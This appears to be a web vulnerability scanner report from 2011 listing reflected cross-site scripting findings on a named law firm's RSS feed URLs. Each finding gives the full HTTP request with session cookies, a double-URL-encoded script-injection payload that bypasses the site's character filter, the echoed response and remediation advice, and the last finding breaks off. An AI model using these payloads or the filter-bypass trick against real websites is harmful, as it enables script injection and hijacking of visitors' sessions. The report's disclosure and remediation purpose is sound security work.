GET /rssf2dde%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eed620a3a2e2/practices/Government_Contracts/rss.xml HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:16 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad839%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb98612c93e6 was submitted in the REST URL parameter 2. This input was echoed as ad839"><script>alert(1)</script>b98612c93e6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practicesad839%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb98612c93e6/Government_Contracts/rss.xml HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:17 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a8ea8%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7c519c08fc2 was submitted in the REST URL parameter 3. This input was echoed as a8ea8"><script>alert(1)</script>7c519c08fc2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practices/Government_Contractsa8ea8%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7c519c08fc2/rss.xml HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:20 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9c8b4%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4f8e8ef06bb was submitted in the REST URL parameter 4. This input was echoed as 9c8b4"><script>alert(1)</script>4f8e8ef06bb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practices/Government_Contracts/rss.xml9c8b4%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4f8e8ef06bb HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:21 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86cb4%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253efd584c5ec86 was submitted in the REST URL parameter 1. This input was echoed as 86cb4"><script>alert(1)</script>fd584c5ec86 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss86cb4%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253efd584c5ec86/practices/Health_Care/rss.xml HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:16 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cc67c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed7658866ddf was submitted in the REST URL parameter 2. This input was echoed as cc67c"><script>alert(1)</script>d7658866ddf in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practicescc67c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed7658866ddf/Health_Care/rss.xml HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:18 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f87dc%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eee3d1a37ca4 was submitted in the REST URL parameter 3. This input was echoed as f87dc"><script>alert(1)</script>ee3d1a37ca4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practices/Health_Caref87dc%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eee3d1a37ca4/rss.xml HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:21 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f1cbf%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eefc92306738 was submitted in the REST URL parameter 4. This input was echoed as f1cbf"><script>alert(1)</script>efc92306738 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practices/Health_Care/rss.xmlf1cbf%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eefc92306738 HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:22 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7953a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea4cf2c1a532 was submitted in the REST URL parameter 1. This input was echoed as 7953a"><script>alert(1)</script>a4cf2c1a532 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss7953a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea4cf2c1a532/practices/Insurance/rss.xml HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:20 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a0999%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5bd9f5471e was submitted in the REST URL parameter 2. This input was echoed as a0999"><script>alert(1)</script>5bd9f5471e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practicesa0999%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5bd9f5471e/Insurance/rss.xml HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:21 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a3861%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e021aa92fc8e was submitted in the REST URL parameter 3. This input was echoed as a3861"><script>alert(1)</script>021aa92fc8e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practices/Insurancea3861%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e021aa92fc8e/rss.xml HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:21 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dc903%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8c3f9de4a75 was submitted in the REST URL parameter 4. This input was echoed as dc903"><script>alert(1)</script>8c3f9de4a75 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practices/Insurance/rss.xmldc903%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8c3f9de4a75 HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:22 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a8cc0%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e97bf63e9708 was submitted in the REST URL parameter 1. This input was echoed as a8cc0"><script>alert(1)</script>97bf63e9708 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rssa8cc0%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e97bf63e9708/practices/Intellectual_Property/rss.xml HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:23 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ebee6%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8cb5eed4035 was submitted in the REST URL parameter 2. This input was echoed as ebee6"><script>alert(1)</script>8cb5eed4035 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practicesebee6%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8cb5eed4035/Intellectual_Property/rss.xml HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:24 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a6c9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef1282db072c was submitted in the REST URL parameter 3. This input was echoed as 9a6c9"><script>alert(1)</script>f1282db072c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practices/Intellectual_Property9a6c9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef1282db072c/rss.xml HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:25 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f7748%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1dd7e1a93aa was submitted in the REST URL parameter 4. This input was echoed as f7748"><script>alert(1)</script>1dd7e1a93aa in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practices/Intellectual_Property/rss.xmlf7748%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1dd7e1a93aa HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:26 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d092e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1334ddb4b76 was submitted in the REST URL parameter 1. This input was echoed as d092e"><script>alert(1)</script>1334ddb4b76 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rssd092e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1334ddb4b76/practices/International_Trade/rss.xml HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:23 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d46e9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef30c22f14ce was submitted in the REST URL parameter 2. This input was echoed as d46e9"><script>alert(1)</script>f30c22f14ce in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practicesd46e9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef30c22f14ce/International_Trade/rss.xml HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:24 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fca14%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea76b08aeebe was submitted in the REST URL parameter 3. This input was echoed as fca14"><script>alert(1)</script>a76b08aeebe in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practices/International_Tradefca14%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea76b08aeebe/rss.xml HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:25 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eb24c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6e42435c0a7 was submitted in the REST URL parameter 4. This input was echoed as eb24c"><script>alert(1)</script>6e42435c0a7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
